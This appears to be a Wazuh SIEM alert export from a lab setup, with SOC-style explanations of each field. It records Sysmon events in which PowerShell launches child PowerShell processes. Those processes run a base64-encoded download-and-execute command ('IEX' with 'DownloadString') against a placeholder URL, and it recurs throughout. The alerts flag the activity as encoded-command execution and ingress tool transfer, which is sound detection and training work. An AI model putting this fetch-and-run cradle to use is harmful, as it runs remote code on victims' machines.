data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:19.846 ProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00} ProcessId: 13412 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00} ParentProcessId: 9520 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:19.846
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd97-680a-a20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd94-680a-9f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:25.594+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:25.594+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  91
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534365.1831482
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:23.1989175Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285278
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:23.146 ProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00} ProcessId: 13412 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ws0ywxcj.g4z.ps1 CreationUtcTime: 2025-04-24 22:39:23.146 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:23.146
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd97-680a-a20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ws0ywxcj.g4z.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:23.146
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:29.035+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:29.035+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  88
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534369.1834251
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:26.3809613Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285299
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:24.789 ProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00} ProcessId: 12304 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00} ParentProcessId: 13412 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:24.789
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd9c-680a-a40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd97-680a-a20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:29.039+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:29.039+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  92
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534369.1842322
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:26.6347400Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285300
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:26.599 ProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00} ProcessId: 12304 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kkk1op4e.muk.ps1 CreationUtcTime: 2025-04-24 22:39:26.599 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:26.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd9c-680a-a40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kkk1op4e.muk.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:26.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:32.737+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:32.737+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  89
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534372.1845091
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:30.0574559Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285327
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

